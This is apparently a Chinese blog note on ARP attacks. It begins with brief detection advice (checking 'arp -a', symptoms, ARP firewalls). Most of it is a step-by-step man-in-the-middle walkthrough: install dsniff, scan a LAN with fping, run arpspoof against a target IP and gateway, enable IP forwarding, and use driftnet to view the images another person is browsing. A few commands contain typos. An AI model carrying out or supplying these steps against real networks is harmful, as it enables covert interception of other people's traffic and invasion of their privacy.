攻击原理请参考https://blog.csdn.net/weixin_43900387/article/details/104207229
arp攻击检测
首先诊断是否为ARP病毒攻击
1、当发现上网明显变慢,或者突然掉线时,我们可以用arp -a命令来检查ARP表:(点击“开始”按钮-选择“运行”-输入“cmd”点击"确定"按钮,在窗口中输入“arp -a”命令)如果发现网关的MAC地址发生了改变,或者发现有很多IP指向同一个物理地址,那么肯定就是ARP欺骗所致。这时可以通过”arp -d“清除arp列表,重新访问。
2、利用ARP防火墙类软件(如:360ARP防火墙、AntiARPSniffer等
有如下现象可能是遭受Arp攻击:
1、用户掉线、频繁断网、上网慢、业务中断或无法上网。
2、设备CPU占用率较高、设备托管、下挂设备掉线、设备主备状态震荡、设备端口指示灯红色快闪。
3、Ping有时延、丢包或不通。
原理简单来说就是:
arp欺骗攻击:目标的ip流量会经过我的网卡,从网关出去,
arp断网攻击:目标的ip流量会经过我的网卡
首先安装aprspoof工具:
apt-get install dsniff ssldump
用法提示: arpspoof -h
扫局域网中的ip :
1. fping -asg 192.168.163.0/24
2. 用法:arpspoof -i -t eth0 被攻击的ip 网关
例如:arpspoof -i eth0 -t 192.168.163.130 192.168.163.2
ip流量转发:查看他人图片
echo 1>/proc/sys/net/ipv4/ip_forward
然后再进行断网操作开始欺骗
1.arp欺骗 一系列操作 成功之后
2.driftnet :获取本机的网卡图片 目标--》我的网卡--》网关
看我自己的网卡图片信息 driftnet -i eth0 即可弹出小框出现图片信息